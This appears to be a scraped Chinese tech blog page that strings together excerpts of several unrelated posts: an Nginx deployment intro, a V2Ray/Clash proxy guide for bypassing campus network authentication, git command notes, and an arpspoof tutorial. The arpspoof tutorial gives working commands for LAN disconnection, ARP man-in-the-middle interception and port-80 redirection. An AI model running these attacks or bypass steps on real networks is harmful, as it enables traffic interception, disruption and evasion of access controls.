Nginx 部署超星学习通签到服务
在 AWS 的 EC2 服务器上部署了这玩意,一方面分散华为云那个服务器的压力,一方面体验一下部署在服务器的流程。之前一直都是静态网页部署+云函数,比较省事。
用的 PM2 运行的接口服务,端口号是 5000
,可以直接通过域名+端口号访问接口,但是感觉这样不太优雅,干脆用 Nginx 代理一下。让网站可以通过 /chaoxing
路径访问,让接口可以通过 /chaoxing-api
来访问。
技术博客
查看所有标签在 AWS 的 EC2 服务器上部署了这玩意,一方面分散华为云那个服务器的压力,一方面体验一下部署在服务器的流程。之前一直都是静态网页部署+云函数,比较省事。
用的 PM2 运行的接口服务,端口号是 5000
,可以直接通过域名+端口号访问接口,但是感觉这样不太优雅,干脆用 Nginx 代理一下。让网站可以通过 /chaoxing
路径访问,让接口可以通过 /chaoxing-api
来访问。
根据《中华人民共和国计算机信息网络国际联网管理暂行规定》,请勿将该技术用于违法搭建“机场”服务,建立非法信道进行国际联网。
安卓12已经不支持 L2TP/IPSec PSK
的 VPN,用 Softether绕过校园网限制 已经不行了,安卓12的手机无法连接。同时,这种方法使用起来也不稳定,不登陆的情况下连上 Wifi 会多次被踢掉线,掉线就要重新连接WiFi、连接VPN,再加上Windows11的过渡动画是真迟钝,这简直是灾难。所以,这次 用 V2ray 来优雅地改善体验。
服务端能上网!早期不优雅的使用方法,见 如何绕过校园网验证,在宿舍免费上办公区的网,享受不拥挤的网络。
下载 v2ray,我用的是 v2ray-windows-64
版本,自行选择合适的包,下载并解压到任意目录下。
解压后,找到 config.json
,配置此文件。可以自己写,也可以参考以下写好的:
{
"log": {
"loglevel": "warning"
},
"inbounds": [
{
"port": 10492, // 自定义端口号
"listen": "0.0.0.0",
"protocol": "vmess",
"settings": {
"auth": "noauth",
"udp": true,
"ip": "127.0.0.1",
"clients": [
{
"id": "e061dc06-5c6e-4176-aa36-43b034574194",
"alterId": 0
}
// 可以配置多个用户,id不可相同
]
}
}
],
"outbounds": [
{
"protocol": "freedom",
"settings": {},
"tag": "direct"
},
{
"protocol": "blackhole",
"settings": {},
"tag": "blocked"
}
],
"routing": {
"domainStrategy": "IPOnDemand",
"rules": [
{
"type": "field",
"domain": [
"geosite:category-ads"
],
"outboundTag": "blocked"
}
]
}
}
在目录下可以用命令来随机生成客户端 uuid,可以用来填入上面配置文件。
./v2ray.exe uuid
配置文件为 .yml
格式,参考:
mixed-port: 7890
allow-lan: true
mode: Global
log-level: info
external-controller: :9090
proxies:
- name: client1
server: 10.85.15.30 #填写服务器IP地址
port: 10492 #服务器配置的端口
type: vmess
uuid: e061dc06-5c6e-4176-aa36-43b034574194
alterId: 0
cipher: auto
tls: false
udp: true
#...
#可以根据服务端配置更多节点,注意缩进
proxy-groups: []
rules: null
可以将此文件保存为 xxx.yml
并托管在 IIS ,或者任意可以访问的地方,将该文件下载链接(订阅链接)导入 Clash,即可看到配置的节点。
运行 V2rayN ,直接选择添加VMESS服务器,按照前面的服务器配置内容手动进行填写即可。
服务端在刚刚的解压目录下执行 ./v2ray.exe run
命令来运行 V2Ray,然后客户端就可以用 ClashForAndroid / ClashForWindows 或者 V2rayN / V2rayNg。剩下的就是客户端的使用方法了,与文章主题无关,不再细说。
CFW 建议使用 TUN 模式,CFA 直接用全局代理模式即可。
有时需要提交一次代码,但是有一部分新写上的代码还是半成品,又不舍得删除。或者在切换分支时工作目录和暂存区里那些还没有被提交的修改,它可能会和即将检出的分支产生冲突从而阻止 Git 切换到该分支。
git stash
可以解决这个问题。贮藏(stash)会处理工作目录的脏的状态,即跟踪文件的修改与暂存的改动,然后将未完成的修改保存到一个栈上,而你可以在任何时候重新应用这些改动。
一些常用的命令如下,不算全面但是日常对我来说是够用了。
git clone url
:克隆项目,如需自定义本地文件夹的名称,在 url 之后加个名称即可。git add
:这是个多功能命令,可以用它开始跟踪新文件,或者把已跟踪的发生更改的文件放到暂存区,还能用于合并时把有冲突的文件标记为已解决状态等。git rm
:要从 Git 中移除某个文件,就必须要从暂存区域移除,然后提交。可以用 git rm
完成,并连带从工作目录中删除指定的文件,这样以后就不会出现在未跟踪文件清单中了。git diff
:查看尚未暂存的文件更新了哪些部分。在后面加一个 --staged
参数,将比对已暂存文件与最后一次提交的文件差异。本篇内容仅用于学习和测试,本人遵纪守法。
arpspoof 是 dsniff 包里的一个程序,可用于arp攻击。Manjaro 中执行以下命令安装这个软件包就可以使用了。
yay -S dsniff
arpspoof - 截获交换局域网中的数据包。
用法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
描述
arpspoof通过伪造的ARP响应包改变局域网中从目标主机(或所有主机)到另一个主机(host)的数据包转发路径。这是交换局域网中嗅探网络流量的一种极为有效的方法。
内核IP转发(或如fragrouter这样的、用户层面的、能完成同样功能的软件)必须提前开启。
1. 断网攻击,不开启流量转发,使用我的无线网卡 wlp8s0
,攻击网关
sudo arpspoof -i wlp8s0 -t 192.168.1.1
2. 中间人攻击,截获用户和网关之间的流量
开启流量转发
echo 1 >> /proc/sys/net/ipv4/ip_forward
欺骗双方,充当中间人
sudo arpspoof -i wlp8s0 -t 192.168.1.1 192.168.1.106
sudo arpspoof -i wlp8s0 -t 192.168.1.106 192.168.1.1
此时网关以为我是106,而106以为我是网关。双方的流量都将经过这里,使用 WireShark 即可对经过网卡的流量进行分析。
3. 重定向攻击
使局域网所有设备访问的 80 端口,重定向到我这里的 8080 端口,需要开启流量转发。
sudo arpspoof -i wlp8s0 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080